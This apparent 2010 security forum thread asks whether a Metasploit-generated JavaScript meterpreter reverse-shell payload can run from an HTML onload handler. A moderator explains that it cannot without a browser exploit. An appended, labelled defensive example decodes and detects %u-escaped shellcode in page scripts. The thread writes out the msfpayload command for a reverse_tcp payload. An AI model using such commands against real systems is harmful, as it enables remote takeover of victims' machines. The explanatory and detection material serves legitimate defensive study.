Thread: Embedded Payload (javascript)

  1. #1
    Just burned his ISO
    Join Date: Feb 2010
    Posts: 3

    Embedded Payload (javascript)

    I noticed that msfpayload had a js payload generator, and I was wondering if it was possible to just embed the payload in an onload call within an html page, kinda like so:

    First you would generate a meterpreter payload and output it as javascript [J]

    i.e. ./msfpayload windows/meterpreter/reverse_tcp LHOST=000.000.0.0 LPORT=4444 J > meterpreter.js

    then copy the generated script source and paste it within the exploit page's html like below:


    <body onload="meterpreterpayload();">
    <script>
    function meterpreterpayload()
    {
    ###pasted js script generated by msfpayload###
    }
    </script>
    </body>

    I tried it exactly as mentioned here, and didn't pick up anything on my handler when I opened the page in my test Virtual Machine, but I bet you get the idea. Please let me know if you have any suggestions, or if it's just not that easy...

  2. #2
    lupin (Super Moderator)
    Join Date: Jan 2010
    Posts: 2,943

    Re: Embedded Payload (javascript)

    Nope, not that easy. The output from msfpayload is shellcode in Javascript format.

    It's essentially machine language instructions, specific to a particular CPU architecture (x86 for the majority of payloads in msfpayload, but there are others) and Operating System. You would use the JS msfpayload option when you are writing an exploit that uses Javascript as part of the process to inject your own code into an already running process.

    As an example, I used it here when I wrote my tutorial on using heap spraying to inject shellcode into Internet Explorer via exploitation of a use after free vulnerability.

    This type of shellcode is also used in a number of Acrobat exploits I have seen, as Javascript is used to trigger the exploit.

    You can't just insert this into a web page and expect it to work. It needs to be used with an exploit of a vulnerability in the browser software (or plugins) itself.
    Last edited by lupin; 02-16-2010 at 06:22 AM.
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.
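Added example, not from this thread, from Metasploit or from lupin: it shows concretely why the J output is data rather than runnable JavaScript. msfpayload's J format emits the shellcode as a string of %uXXXX escapes (each escape is two little-endian bytes of machine code), which an exploit later turns into memory contents via unescape(). The decoder below unpacks such a string into raw bytes the way an analyst does when triaging a suspicious page or PDF script, and the scanner flags long runs of %u escapes in script text, a common indicator of embedded shellcode worth a closer look. The sample string is constructed for the example (a few x86 NOPs, an int3 and a ret), not real payload output, and all function names are the example's own.

```javascript
// Added example (not the thread's or Metasploit's code).
// msfpayload "J" output is a JavaScript *string* of %uXXXX escapes; each escape
// carries two little-endian bytes of machine code. The browser never executes
// the string as script; the exploit has to place the bytes in memory itself.

// Constructed sample, NOT real shellcode: x86 NOP NOP NOP NOP, int3, ret.
const SAMPLE_JS_SHELLCODE = "%u9090%u9090%uc3cc";

// Decode a string made only of %uXXXX escapes into its little-endian bytes.
// Throws if anything other than escapes is present, so stray text is noticed.
function decodeUnicodeEscapes(s) {
  const re = /%u([0-9a-fA-F]{4})/g;
  const bytes = [];
  let consumed = 0;
  let m;
  while ((m = re.exec(s)) !== null) {
    if (m.index !== consumed) {
      throw new Error(`unexpected text at offset ${consumed}`);
    }
    const v = parseInt(m[1], 16);
    bytes.push(v & 0xff, v >> 8); // low byte first, as unescape() would lay it out
    consumed = m.index + m[0].length;
  }
  if (consumed !== s.length) {
    throw new Error(`unexpected text at offset ${consumed}`);
  }
  return Uint8Array.from(bytes);
}

// Render bytes as a space-separated hex dump for inspection.
function toHex(bytes) {
  return Array.from(bytes, (b) => b.toString(16).padStart(2, "0")).join(" ");
}

// Scan script text for runs of %u escapes at least minBytes long and return
// where they are, how many bytes they decode to, and the decoded hex.
// Real shellcode strings are hundreds of bytes; the threshold is a tunable.
function findUnicodeEscapeBlobs(scriptText, minBytes = 32) {
  const minEscapes = Math.ceil(minBytes / 2);
  const re = new RegExp(`(?:%u[0-9a-fA-F]{4}){${minEscapes},}`, "g");
  const hits = [];
  let m;
  while ((m = re.exec(scriptText)) !== null) {
    const bytes = decodeUnicodeEscapes(m[0]);
    hits.push({ offset: m.index, byteLength: bytes.length, hex: toHex(bytes) });
  }
  return hits;
}

// Constructed page script resembling what an analyst pulls out of a page:
// one shellcode-style blob plus an unrelated single escape that should not match.
const SAMPLE_PAGE_SCRIPT =
  'var pad = unescape("%u0041"); ' +
  'var sc = unescape("' + SAMPLE_JS_SHELLCODE + '"); ' +
  'document.title = "hello";';

// Stand-alone run: decode the sample and scan the constructed script.
console.log("decoded:", toHex(decodeUnicodeEscapes(SAMPLE_JS_SHELLCODE)));
for (const hit of findUnicodeEscapeBlobs(SAMPLE_PAGE_SCRIPT, 4)) {
  console.log(`blob at offset ${hit.offset}: ${hit.byteLength} bytes -> ${hit.hex}`);
}
```

The decoded bytes are x86 instructions, which is why pasting the string into a function body does nothing: the JavaScript engine sees only a string literal, and unescape() only turns it into characters in memory. The scanner is a cheap first-pass indicator for log or page review; it reports a blob's location and size so the bytes can be handed to a disassembler, and the byte threshold should be raised for production use to avoid flagging ordinary short unescape() calls.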
